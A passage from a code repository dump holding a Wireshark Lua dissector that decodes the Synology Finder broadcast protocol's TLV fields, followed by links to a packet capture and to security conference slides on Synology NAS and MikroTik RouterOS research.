format_uint_hex, 132 | [0x11] = format_string, 133 | [0x12] = format_ipv4, -- Address object 134 | [0x13] = format_ipv4, 135 | [0x14] = format_ipv4, 136 | [0x15] = format_ipv4, 137 | [0x19] = format_string, 138 | [0x1e] = format_ipv4, 139 | [0x20] = format_uint_hex, 140 | [0x21] = format_string, 141 | [0x29] = format_string, 142 | [0x2a] = format_string, 143 | [0x49] = format_uint_le, 144 | [0x4a] = format_string, 145 | [0x4b] = format_string, 146 | [0x70] = format_string, 147 | [0x71] = format_uint_bool, 148 | [0x73] = format_string, 149 | [0x75] = format_uint_le, 150 | [0x76] = format_uint_le, 151 | [0x77] = format_string, 152 | [0x78] = format_string, 153 | [0x79] = format_uint_hex, 154 | [0x7c] = format_string, 155 | [0x90] = format_uint_le, 156 | [0xc0] = format_string, 157 | [0xc1] = format_string, 158 | [0xc3] = format_uint_bool, 159 | [0xc4] = format_string, 160 | [0xc5] = format_uint_hex 161 | } 162 | 163 | -- register fields 164 | synoFinderProtocol.fields = { 165 | magic, 166 | tlv, type, length, value, -- tlv 167 | packetType, serverName, ipAddress, ipMask, ipGateway, macAddress, dns, packetSubtype, password, buildNum, unique, supportRaid, username, shareFolder, port, sslPort, productVersion, model, memtestErrorCode, smallFixNum, serialNum, osName, supportOnsiteTool, publicKey, randomBytes, -- specific value fields 168 | value8, value16, value32 -- general value fields 169 | } 170 | 171 | function getFieldType(field) 172 | local fieldString = tostring(field) 173 | local i, j = string.find(fieldString, "ftypes.* " .. "base") 174 | return string.sub(fieldString, i + 7, j - (1 + string.len("base"))) 175 | end 176 | 177 | function getFieldByType(type, length) 178 | local tmp_field = typeFields[type] 179 | if(tmp_field) then 180 | return tmp_field -- specific value filed 181 | else 182 | if length == 4 then -- general value field 183 | return value32 184 | elseif length == 2 then 185 | return value16 186 | elseif length == 1 then 187 | return value8 188 | else 189 | return value 190 | end 191 | end 192 | end 193 | 194 | function formatValue(type, value) 195 | local tmp_func = typeFormats[type] 196 | if(tmp_func) then 197 | return tmp_func(value) 198 | else 199 | return "" 200 | end 201 | end 202 | 203 | -- reference: https://gist.github.com/yi/01e3ab762838d567e65d 204 | function string_fromhex(str) 205 | return (str:gsub('..', function (cc) 206 | return string.char(tonumber(cc, 16)) 207 | end)) 208 | end 209 | 210 | function synoFinderProtocol.dissector(buffer, pinfo, tree) 211 | -- (buffer: type Tvb, pinfo: type Pinfo, tree: type TreeItem) 212 | local buffer_length = buffer:len() 213 | if buffer_length == 0 then return end 214 | 215 | local magicValue = buffer(0, 8):string() 216 | local isEncrypt = 0 217 | if magicValue == string_fromhex("1234556653594e4f") then 218 | isEncrypt = 1 219 | elseif magicValue ~= string_fromhex("1234567853594e4f") then 220 | return 221 | end 222 | 223 | pinfo.cols.protocol = synoFinderProtocol.name 224 | 225 | local subtree = tree:add(synoFinderProtocol, buffer(), "Synology Finder Protocol") 226 | subtree:add_le(magic, buffer(0, 8)) 227 | 228 | local offset = 0 229 | local payloadStart = 8 230 | if isEncrypt == 1 then 231 | -- just shows the raw encrypted data 232 | Dissector.get("data"):call(buffer(payloadStart+offset):tvb(), pinfo, subtree) 233 | else 234 | while payloadStart + offset < buffer_length do 235 | local tlvType = buffer(payloadStart + offset, 1):uint() 236 | local tlvLength = buffer(payloadStart + offset + 1, 1):uint() 237 | local valueContent = buffer(payloadStart + offset + 2, tlvLength) 238 | local tlvField = getFieldByType(tlvType, tlvLength) 239 | local fieldName = getFieldName(tlvField) 240 | local description 241 | if fieldName == "Value" then 242 | description = "TLV (type" .. ":" .. string.format("0x%x", tlvType) .. ")" 243 | else 244 | description = fieldName .. ": " .. tostring(formatValue(tlvType, valueContent)) 245 | end 246 | 247 | -- reference: https://osqa-ask.wireshark.org/questions/42404/lua-dissector-tree-collapse/ 248 | -- local tlvSubtree = subtree:add(synoFinderProtocol, buffer(payloadStart+offset, tlvLength+2), description) 249 | local tlvSubtree = subtree:add(tlv, buffer(payloadStart+offset, tlvLength+2)):set_text(description) 250 | tlvSubtree:add_le(type, buffer(payloadStart + offset, 1)) 251 | tlvSubtree:add_le(length, buffer(payloadStart + offset + 1, 1)) 252 | if tlvLength > 0 then 253 | local fieldType = getFieldType(tlvField) 254 | if string.find(fieldType, "^IP") == 1 then 255 | -- start with "IP" 256 | tlvSubtree:add(tlvField, buffer(payloadStart + offset + 2, tlvLength)) 257 | else 258 | tlvSubtree:add_le(tlvField, buffer(payloadStart + offset + 2, tlvLength)) 259 | end 260 | end 261 | 262 | offset = offset + 2 + tlvLength 263 | end 264 | 265 | if payloadStart + offset ~= buffer_length then 266 | -- fallback dissector that just shows the raw data 267 | Dissector.get("data"):call(buffer(payloadStart+offset):tvb(), pinfo, tree) 268 | end 269 | end 270 | end 271 | 272 | local udp_port = DissectorTable.get("udp.port") 273 | udp_port:add(9999, synoFinderProtocol) -- udp broadcast port 274 | -------------------------------------------------------------------------------- /scripts/Synology/syno_finder/synology_finder.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/scripts/Synology/syno_finder/synology_finder.pcap -------------------------------------------------------------------------------- /slides/EU-22-Chen-LCDPwn-Breaking-Enterprise.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/slides/EU-22-Chen-LCDPwn-Breaking-Enterprise.pdf -------------------------------------------------------------------------------- /slides/EU-23-Quan-Breaking-Theoretical-Limits.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/slides/EU-23-Quan-Breaking-Theoretical-Limits.pdf -------------------------------------------------------------------------------- /slides/HITB2021AMS-A_Journey_into_Synology_NAS.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/slides/HITB2021AMS-A_Journey_into_Synology_NAS.pdf -------------------------------------------------------------------------------- /slides/POC2019-Bug_Hunting_in_Synology_NAS.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/slides/POC2019-Bug_Hunting_in_Synology_NAS.pdf -------------------------------------------------------------------------------- /slides/POC2022-MikroTik_RouterOS_Security-The_Forgotten_IPC_Message.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/slides/POC2022-MikroTik_RouterOS_Security-The_Forgotten_IPC_Message.pdf --------------------------------------------------------------------------------